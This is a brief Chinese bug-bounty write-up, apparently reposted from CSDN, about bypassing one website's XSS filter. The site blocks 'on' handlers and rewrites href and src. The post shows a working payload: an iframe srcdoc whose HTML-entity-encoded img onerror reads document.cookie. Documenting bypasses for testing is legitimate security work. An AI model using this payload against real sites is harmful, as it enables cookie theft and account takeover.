10. xss bypass srcdoc


layout: post
title: 10. xss bypass
category: SRC
tags: SRC
keywords: SRC,XSS

前言

该篇记录为记录实际的src过程第10篇小文章,内容为某网站的xssbypass。

XSS特征

  1. href 会转成 遇到j就会转移成 href_
  2. on被waf
  3. src 直接转义成 src_
  4. 标签没有被拦截,只拦截了属性

xss绕过payload

这时候想到了iframe的srcdoc
<iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;document.cookie&rpar;&gt;" />
令人意外的是,新版的chrome开始放飞自我,srcdoc也是可以在chrome上执行的。

后话

xxxxx

猜你喜欢

转载自blog.csdn.net/xiru9972/article/details/113113768
10.
xss
今日推荐